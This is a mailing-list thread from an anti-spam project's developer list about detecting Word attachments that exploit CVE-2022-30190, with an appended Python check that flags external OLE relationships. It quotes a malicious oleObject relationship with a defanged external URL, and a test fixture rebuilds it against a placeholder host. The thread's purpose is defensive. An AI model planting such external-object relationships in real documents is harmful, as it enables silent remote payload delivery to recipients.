Thanks for getting back with me Thomas.  I know that we can't block ms-msdt
because that's downloaded by Word after opening the file, but I was talking
about blocking files that have the URI reference, like:
  <Relationship Id="rId996"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!"
    TargetMode="External"/>

Basically, if a document has an external reference, strip the file out of
the email, essentially inspecting it like we do .docx files looking for bad
content - similar to removing a PDF that contains javascript.

On Mon, Jun 13, 2022 at 3:55 AM Thomas Eckardt <thomas.ecka...@thockar.com>
wrote:

> This is not possible because:
>
> ....
> Note that the suspicious scheme ("ms-msdt:/") is *not* present in the
> document. It's present in the first stage payload that will be
> downloaded by Office.
> ....
> and
> ....
> The document contains an external reference *pointing to a malicious URL*:
> ....
>
> If the malicious URL is known, it can be detected by assp using URIBL.
> Keep in mind that those malicious URLs can be generated and changed very
> quickly!
>
> > Hopefully clamav will eventually catch it,
>
> I don't think this is possible for every case. Also traditional AV
> scanners need to know all used malicious URLs. Only a behavior analysis of
> the document will be able to detect the malicious download and payload.
>
>
> Solutions for CVE-2022-30190 are provided by Microsoft:
>
>
> https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
>
> Thomas
>
>
>
> From: "K Post" <nntp.p...@gmail.com>
> To: "ASSP development mailing list" <assp-test@lists.sourceforge.net>
> Date: 31.05.2022 20:14
> Subject: [Assp-test] blocking new MS doc vulnerability (URI attack vector)
>
>
>
> Hello Thomas,
>
> Any way for ASSP to block this kind of thing?
>
>
> https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694
>
> Hopefully clamav will eventually catch it, but it would be great to be able
> to strip documents using AFC if they contain the URI protocol, just like
> we do for VBA code, etc.
>
> Thanks
> _______________________________________________
> Assp-test mailing list
> Assp-test@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/assp-test
>
>
>
>
>
>
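The check proposed at the top of this thread (open the attached document, look in its relationship parts for an external target such as the oleObject relationship quoted above, and drop the attachment if one is found), as an added Python example that is not ASSP's code or anything posted in the thread. The package builder, the sample relationships and the attacker.invalid host are constructed here; the example goes slightly beyond the message by scanning every .rels part in the package and by excluding ordinary hyperlinks, which are also written with TargetMode="External" and would otherwise make the filter drop most legitimate documents.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_TYPE = OFFICE_REL + "oleObject"
HYPERLINK_TYPE = OFFICE_REL + "hyperlink"

def external_relationships(docx_bytes):
    """(part, Id, Type, Target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue  # only the relationship parts carry targets
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Id"), rel.get("Type"), rel.get("Target")))
    return found

def should_strip(docx_bytes):
    """External relationships other than plain hyperlinks. Ordinary links are
    also TargetMode="External", so keying on that attribute alone would drop
    most legitimate mail; an external oleObject is what the filter acts on."""
    return [r for r in external_relationships(docx_bytes) if r[2] != HYPERLINK_TYPE]

def build_package(rels_xml):
    """Constructed minimal .docx-shaped zip holding just the parts checked."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

# Constructed samples; attacker.invalid is a placeholder host, not the real one.
SUSPICIOUS = build_package(
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId996" Type="{OLE_TYPE}" '
    'Target="https://attacker.invalid/RDF842l.html!" TargetMode="External"/>'
    '</Relationships>')
BENIGN = build_package(
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId5" Type="{HYPERLINK_TYPE}" '
    'Target="https://example.com/" TargetMode="External"/>'
    f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
    '</Relationships>')
```

A mail filter would run should_strip() on each OOXML attachment and quarantine the message when the list is non-empty; the benign sample, which only carries a hyperlink and an internal styles part, passes.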